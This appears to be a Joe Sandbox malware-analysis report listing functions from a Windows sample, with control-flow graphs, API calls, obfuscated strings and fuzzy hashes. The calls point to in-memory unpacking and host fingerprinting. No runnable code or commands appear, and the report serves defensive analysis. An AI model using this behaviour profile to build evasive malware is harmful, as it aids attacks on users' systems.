                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041D003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 241 41d003c-41d0047 242 41d004c-41d0263 call 41d0a3f call 41d0e0f call 41d0d90 VirtualAlloc 241->242 243 41d0049 241->243 258 41d028b-41d0292 242->258 259 41d0265-41d0289 call 41d0a69 242->259 243->242 261 41d02a1-41d02b0 258->261 262 41d02ce-41d03c2 VirtualProtect call 41d0cce call 41d0ce7 259->262 261->262 263 41d02b2-41d02cc 261->263 270 41d03d1-41d03e0 262->270 263->261 271 41d0439-41d04b8 VirtualFree 270->271 272 41d03e2-41d0437 call 41d0ce7 270->272 274 41d04be-41d04cd 271->274 275 41d05f4-41d05fe 271->275 272->270 279 41d04d3-41d04dd 274->279 276 41d077f-41d0789 275->276 277 41d0604-41d060d 275->277 282 41d078b-41d07a3 276->282 283 41d07a6-41d07b0 276->283 277->276 280 41d0613-41d0637 277->280 279->275 284 41d04e3-41d0505 LoadLibraryA 279->284 289 41d063e-41d0648 280->289 282->283 285 41d086e-41d08be LoadLibraryA 283->285 286 41d07b6-41d07cb 283->286 287 41d0517-41d0520 284->287 288 41d0507-41d0515 284->288 297 41d08c7-41d08f9 285->297 290 41d07d2-41d07d5 286->290 291 41d0526-41d0547 287->291 288->291 289->276 292 41d064e-41d065a 289->292 293 41d0824-41d0833 290->293 294 41d07d7-41d07e0 290->294 295 41d054d-41d0550 291->295 292->276 296 41d0660-41d066a 292->296 303 41d0839-41d083c 293->303 298 41d07e4-41d0822 294->298 299 41d07e2 294->299 300 41d0556-41d056b 295->300 301 41d05e0-41d05ef 295->301 302 41d067a-41d0689 296->302 304 41d08fb-41d0901 297->304 305 41d0902-41d091d 297->305 298->290 299->293 306 41d056d 300->306 307 41d056f-41d057a 300->307 301->279 308 41d068f-41d06b2 302->308 309 41d0750-41d077a 302->309 303->285 310 41d083e-41d0847 303->310 304->305 306->301 312 41d057c-41d0599 307->312 313 41d059b-41d05bb 307->313 314 41d06ef-41d06fc 308->314 315 41d06b4-41d06ed 308->315 309->289 316 41d0849 310->316 317 41d084b-41d086c 310->317 324 41d05bd-41d05db 312->324 313->324 318 41d06fe-41d0748 314->318 319 41d074b 314->319 315->314 316->285 317->303 318->319 319->302 324->295
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 041D024D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: cess$kernel32.dll
                                                    • API String ID: 4275171209-1230238691
                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction ID: 339ae679fd34fd2d4a8d9683449fdeaba0574bcec52c23c1021cfcc79f7169d1
                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction Fuzzy Hash: A1526AB5A01229DFDB64CF58C984BACBBB1BF09304F1580D9E94DAB351DB30AA85DF14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041D690 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 192COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 362 41d690-41d70e 363 41d710-41d744 362->363 364 41d746-41d789 RtlExpandEnvironmentStrings 362->364 363->363 363->364 365 41d792 364->365 366 41d78b-41d790 364->366 367 41d795-41d827 call 433b50 RtlExpandEnvironmentStrings 365->367 366->367 370 41d879-41d8af 367->370 371 41d829 367->371 373 41d8b1-41d8b6 370->373 374 41d8b8-41d8bd 370->374 372 41d830-41d877 371->372 372->370 372->372 375 41d8c0-41d8d1 call 433b50 373->375 374->375 378 41d8f1-41d901 375->378 379 41d8d3-41d8d8 375->379 381 41d921-41d932 call 438d50 378->381 382 41d903-41d90a 378->382 380 41d8e0-41d8ef 379->380 380->378 380->380 385 41d937-41d954 381->385 383 41d910-41d91f 382->383 383->381 383->383
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D77D
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D7A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: -^$AV$SE$X&
                                                    • API String ID: 237503144-3017178743
                                                    • Opcode ID: 126da50c2d0a41b480321852bc94709b34504f4e9e0a0586602205dd78c64019
                                                    • Instruction ID: 414b802ac07eb15e34250c72f36e95362d79bb1e0692564b293e6573eb188213
                                                    • Opcode Fuzzy Hash: 126da50c2d0a41b480321852bc94709b34504f4e9e0a0586602205dd78c64019
                                                    • Instruction Fuzzy Hash: 7A71AAB06083518FE324CF14D8A0BABB7E1EFC6314F114A2DE8E95B280D7789945CB97
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00414950 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 177COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 386 414950-414964 387 414970-414978 386->387 387->387 388 41497a-4149ac RtlExpandEnvironmentStrings 387->388 389 4149b5 388->389 390 4149ae-4149b3 388->390 391 4149b8-414a4c call 433b50 RtlExpandEnvironmentStrings 389->391 390->391 394 414a93-414ac3 391->394 395 414a4e-414a4f 391->395 397 414ac5-414aca 394->397 398 414acc-414ace 394->398 396 414a50-414a91 395->396 396->394 396->396 399 414ad1-414ae8 call 433b50 397->399 398->399 402 414b11-414b21 399->402 403 414aea-414af3 399->403 405 414b41-414b55 call 438ba0 402->405 406 414b23-414b2a 402->406 404 414b00-414b0f 403->404 404->402 404->404 409 414b5a-414b76 405->409 407 414b30-414b3f 406->407 407->405 407->407
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041499D
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 004149CE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: 2M#O$<Y.[$r]Nm$qrs
                                                    • API String ID: 237503144-2765572984
                                                    • Opcode ID: 1eeaee2e8186193ac6611b8cf20863375f2d41a74451ba6092e37ba744e7f2b9
                                                    • Instruction ID: f437b4c60a0e393287c60c1191dc60451405bce4f387bbd6b600237a0ee68e47
                                                    • Opcode Fuzzy Hash: 1eeaee2e8186193ac6611b8cf20863375f2d41a74451ba6092e37ba744e7f2b9
                                                    • Instruction Fuzzy Hash: C751B2B46183419FD320CF14D891BABB7E5EFC6324F054A1DF9958B381E3B89941CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424AF5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 433COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 503 424af5-424b44 504 424b46 503->504 505 424b89-424b92 503->505 506 424b50-424b87 504->506 507 424b94-424b9a 505->507 508 424bab-424ffd 505->508 506->505 506->506 509 424ba0-424ba9 507->509 511 425039-425042 508->511 512 424fff 508->512 509->508 509->509 513 425044-42504a 511->513 514 42505b-425065 call 431cd0 511->514 515 425000-425037 512->515 516 425050-425059 513->516 518 42506a-425076 514->518 515->511 515->515 516->514 516->516 519 42508b-4250b0 call 438070 518->519 520 425078-42507f 518->520 523 4250b5-4250d8 GetPhysicallyInstalledSystemMemory 519->523 521 425080-425089 520->521 521->519 521->521 524 4250da-4250e3 523->524 525 42512e-42513b 523->525 527 4250e5 524->527 528 42513d-425142 524->528 526 425153-4251b9 525->526 531 425203-425255 526->531 532 4251bb 526->532 533 4250f0-42511a 527->533 529 425121-42512c 528->529 530 425144-425150 528->530 529->526 530->526 535 4252a7-4252ad 531->535 536 425257 531->536 534 4251c0-425201 532->534 533->533 537 42511c-42511f 533->537 534->531 534->534 539 4252cb-4252d3 535->539 540 4252af-4252b2 535->540 538 425260-4252a5 536->538 537->529 537->530 538->535 538->538 542 4252d5-4252d6 539->542 543 4252eb-4252f7 539->543 541 4252c0-4252c9 540->541 541->539 541->541 546 4252e0-4252e9 542->546 544 42530b-4253a2 543->544 545 4252f9-4252ff 543->545 548 4253e3-4253ec 544->548 549 4253a4 544->549 547 425300-425309 545->547 546->543 546->546 547->544 547->547 551 42540b-425417 548->551 552 4253ee-4253f4 548->552 550 4253b0-4253e1 549->550 550->548 550->550 554 42542b-4254cc 551->554 555 425419-42541f 551->555 553 425400-425409 552->553 553->551 553->553 556 425420-425429 555->556 556->554 556->556
                                                    APIs
                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004250BF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: InstalledMemoryPhysicallySystem
                                                    • String ID: M:h:$P6D+$hFt=
                                                    • API String ID: 3960555810-4191368970
                                                    • Opcode ID: c278c4235c0e40e0a55a1437a375328b041559dd9e5fde0177f8855f0f599da5
                                                    • Instruction ID: 6d38b88902e1eb16ca30da568e3269f0221434b507219f1e067bc0dfabd335eb
                                                    • Opcode Fuzzy Hash: c278c4235c0e40e0a55a1437a375328b041559dd9e5fde0177f8855f0f599da5
                                                    • Instruction Fuzzy Hash: 6BF14C70504F928BD726CF35C4687A3BBE1AF56308F44496EC4FA8B792C779A406CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424F8F Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 366COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 557 424f8f-424ffd call 42c4d0 call 408700 563 425039-425042 557->563 564 424fff 557->564 565 425044-42504a 563->565 566 42505b-425076 call 431cd0 563->566 567 425000-425037 564->567 568 425050-425059 565->568 571 42508b-4250d8 call 438070 GetPhysicallyInstalledSystemMemory 566->571 572 425078-42507f 566->572 567->563 567->567 568->566 568->568 576 4250da-4250e3 571->576 577 42512e-42513b 571->577 573 425080-425089 572->573 573->571 573->573 579 4250e5 576->579 580 42513d-425142 576->580 578 425153-4251b9 577->578 583 425203-425255 578->583 584 4251bb 578->584 585 4250f0-42511a 579->585 581 425121-42512c 580->581 582 425144-425150 580->582 581->578 582->578 587 4252a7-4252ad 583->587 588 425257 583->588 586 4251c0-425201 584->586 585->585 589 42511c-42511f 585->589 586->583 586->586 591 4252cb-4252d3 587->591 592 4252af-4252b2 587->592 590 425260-4252a5 588->590 589->581 589->582 590->587 590->590 594 4252d5-4252d6 591->594 595 4252eb-4252f7 591->595 593 4252c0-4252c9 592->593 593->591 593->593 598 4252e0-4252e9 594->598 596 42530b-4253a2 595->596 597 4252f9-4252ff 595->597 600 4253e3-4253ec 596->600 601 4253a4 596->601 599 425300-425309 597->599 598->595 598->598 599->596 599->599 603 42540b-425417 600->603 604 4253ee-4253f4 600->604 602 4253b0-4253e1 601->602 602->600 602->602 606 42542b-4254cc 603->606 607 425419-42541f 603->607 605 425400-425409 604->605 605->603 605->605 608 425420-425429 607->608 608->606 608->608
                                                    APIs
                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004250BF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: InstalledMemoryPhysicallySystem
                                                    • String ID: M:h:$P6D+$hFt=
                                                    • API String ID: 3960555810-4191368970
                                                    • Opcode ID: 32e0737a2d6175cdbece8af79c35379da23b45502fd7d699c5d466c5fa412165
                                                    • Instruction ID: f66b18d75a9a4d2bb6148ac8f6660ab2d7ad2189567b3251afa320a6a21df7b8
                                                    • Opcode Fuzzy Hash: 32e0737a2d6175cdbece8af79c35379da23b45502fd7d699c5d466c5fa412165
                                                    • Instruction Fuzzy Hash: 0ED15A70504F528BE726CF35C4A87A7BBE1AF56308F44496DC0FA8B792C779A406CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041DF50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 609 41df50-41e009 610 41e059-41e099 RtlExpandEnvironmentStrings 609->610 611 41e00b 609->611 613 41e0a2 610->613 614 41e09b-41e0a0 610->614 612 41e010-41e057 611->612 612->610 612->612 615 41e0a5-41e12e call 433b50 RtlExpandEnvironmentStrings 613->615 614->615 618 41e130-41e16b 615->618 619 41e16d-41e17a call 417810 615->619 618->618 618->619 621 41e17f-41e182 619->621
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041E08D
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 0041E0BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: ru$M3
                                                    • API String ID: 237503144-652937946
                                                    • Opcode ID: 7291a3a811873626bd3b785a5b847c75c0ba1258cac978df8a67f20d3e36ac33
                                                    • Instruction ID: ee0422986e9a500056daf517ec787597a82c07e08ececa7a1628db096f87ed23
                                                    • Opcode Fuzzy Hash: 7291a3a811873626bd3b785a5b847c75c0ba1258cac978df8a67f20d3e36ac33
                                                    • Instruction Fuzzy Hash: 585153B5108381AFE314CF01C990B5BBBE5ABCA354F10892DF8A55B381C775DA868B96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00431DD5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 622 431dd5-431e35 call 438070 GetVolumeInformationW
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00431E18
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID: :$C$\
                                                    • API String ID: 2039140958-3809124531
                                                    • Opcode ID: 66204d55befe17f0d94a4a8d29d4561092dd70cceac0cbdb9e091147346ca143
                                                    • Instruction ID: c07b020124bcaf9168d5cc752a0c39b43d1a69f77c2585f3e396cbfa2ffbe00c
                                                    • Opcode Fuzzy Hash: 66204d55befe17f0d94a4a8d29d4561092dd70cceac0cbdb9e091147346ca143
                                                    • Instruction Fuzzy Hash: 09F06574654301BBE328CF10ED27F1A72A49F86B04F20982DB245961D0E7B5AA189A5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00408C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified, xrefs: 00408CBD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID: in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified
                                                    • API String ID: 621844428-4175449110
                                                    • Opcode ID: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
                                                    • Instruction ID: 59104990f458cfd7c5091e5889e4cb5e8d5d284f7426018ae83b6ee6547e8fc3
                                                    • Opcode Fuzzy Hash: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
                                                    • Instruction Fuzzy Hash: 8CF081B180D61496FA107BB56B0A26A3E786F20354F10063FE8C2751C2EE3D444952BF
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00436041 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID: ^]
                                                    • API String ID: 1029625771-1882935148
                                                    • Opcode ID: 052ae51dc26a683516fa0474b257cbb9c1e58a34672b0d67708fa9d60aa416e8
                                                    • Instruction ID: 7efbe0a01219f739987a36331eecae1ceeecbc8983e72e3a87576bfb5e9ed186
                                                    • Opcode Fuzzy Hash: 052ae51dc26a683516fa0474b257cbb9c1e58a34672b0d67708fa9d60aa416e8
                                                    • Instruction Fuzzy Hash: 88318DB4119342ABEB08CF10D66461FBBF2AFC9748F158A1DE4851B759D738C941CF8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042D608 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL ref: 0042D6B9
                                                    • GetSystemMetrics.USER32 ref: 0042D6CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherMetricsSystemUser
                                                    • String ID:
                                                    • API String ID: 365337688-0
                                                    • Opcode ID: 9f3c4366f6acc61bef91b6474569325c5038b687278105cc48c3da76987b540e
                                                    • Instruction ID: e31df5cf53579e26f0d038b5bc67af8e11bea7006768dfca6b49015060dc1ea9
                                                    • Opcode Fuzzy Hash: 9f3c4366f6acc61bef91b6474569325c5038b687278105cc48c3da76987b540e
                                                    • Instruction Fuzzy Hash: D53154B4A10B009FD360DF3DC945A22BBE8FB0C600B100A2DE99AC7B50E734B8448B96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00417810 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041784A
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 0041787E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID:
                                                    • API String ID: 237503144-0
                                                    • Opcode ID: 591883fc8cc7e98f5393b82a229ecb00a65222f46bfedd7c35e61c2a286ee97b
                                                    • Instruction ID: 5e955635065adc13492d4d85393db762cd4c4b4ecf76f0ca5c4caab7127c9149
                                                    • Opcode Fuzzy Hash: 591883fc8cc7e98f5393b82a229ecb00a65222f46bfedd7c35e61c2a286ee97b
                                                    • Instruction Fuzzy Hash: EF0104719082047BE7109B65DC86FA77BACEB86774F044629F965C72D0E730A814CBB6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041D0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00000400,?,?,041D0223,?,?), ref: 041D0E19
                                                    • SetErrorMode.KERNELBASE(00000000,?,?,041D0223,?,?), ref: 041D0E1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction ID: 6c97fa4bd2dd87847840acb895d9ca3d9518aaeca79587ca80c3093a4cd33b33
                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction Fuzzy Hash: B1D012312451287BD7002A94DC49BCD7F1CDF09B66F008051FB0DD9080C770954046E5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00427F5A Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: AllocString
                                                    • String ID:
                                                    • API String ID: 2525500382-0
                                                    • Opcode ID: 92e831a09bc4f936f48e8eeb5ce323eeb4de5efd6650885b8006177c34b915f1
                                                    • Instruction ID: 185172400866e4ae2881ea4d0131f492a55f0fd6362865a65d31d09921d293dc
                                                    • Opcode Fuzzy Hash: 92e831a09bc4f936f48e8eeb5ce323eeb4de5efd6650885b8006177c34b915f1
                                                    • Instruction Fuzzy Hash: 42416870208B82DFC324CF28C498716BBE1BB89314F04465DD4EA8BB91DB35E659CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00427F84 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: AllocString
                                                    • String ID:
                                                    • API String ID: 2525500382-0
                                                    • Opcode ID: bf016d29e845508b4c29d0072d113b8df78977f943dd86dea3f8dc8c8d2ed8b8
                                                    • Instruction ID: 21573400e3ca828b42bd540557a661cbeabd0db8bcf4d465cb8ddca8d915cba3
                                                    • Opcode Fuzzy Hash: bf016d29e845508b4c29d0072d113b8df78977f943dd86dea3f8dc8c8d2ed8b8
                                                    • Instruction Fuzzy Hash: 9A414770108B829FD315CF28C498746FFE0BB5A314F04875DD0EA8BB91D775A619CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00436209 Relevance: 1.6, APIs: 1, Instructions: 87libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 58b5376ab79715266d38842c771b014d24dd78366dfdce20fb51004989b06f61
                                                    • Instruction ID: 57a5b52b1dba13f0fb7b71c5e03f91b2e2e218f0aa26cdb764fcf0a20072f155
                                                    • Opcode Fuzzy Hash: 58b5376ab79715266d38842c771b014d24dd78366dfdce20fb51004989b06f61
                                                    • Instruction Fuzzy Hash: 65410770509342AFE708DF11C5A072BBBE2EFCA709F15991CE0851B381C779C94A8F9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00435F1F Relevance: 1.6, APIs: 1, Instructions: 68libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: cf479fc7f12fc99e722106fa3c3008013ec3b7fe3fd27b656824b1d85b0085cc
                                                    • Instruction ID: 23712f21be747c25dae20e80d5a1b49733b7d245948cfec0266e9d122107ec55
                                                    • Opcode Fuzzy Hash: cf479fc7f12fc99e722106fa3c3008013ec3b7fe3fd27b656824b1d85b0085cc
                                                    • Instruction Fuzzy Hash: 3B219074519301ABD308CF20DAA072F7BE2AB86308F158A2DF48557251EB35C9058B8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00433B50 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00433BF1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 54449b854ee1baebf3dc2fe8c903120477d739f3de66941c925630f34d378c1f
                                                    • Instruction ID: 0fd3648b48a7544cf81d28ba84819feb0670e69c12155dd868ef03761d14a466
                                                    • Opcode Fuzzy Hash: 54449b854ee1baebf3dc2fe8c903120477d739f3de66941c925630f34d378c1f
